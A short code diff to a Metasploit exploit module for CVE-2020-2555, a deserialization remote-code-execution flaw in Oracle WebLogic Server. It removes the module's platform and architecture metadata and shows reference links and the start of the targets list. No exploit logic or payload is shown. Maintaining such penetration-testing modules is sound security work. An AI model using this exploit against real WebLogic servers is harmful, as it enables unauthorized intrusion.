@@ -36,8 +36,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server' ],
           [ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ]
         ],
-        'Platform' => %w[unix linux win],
-        'Arch' => [ ARCH_X86, ARCH_X64 ],
         'Privileged' => false,
         'Targets' => [
           [
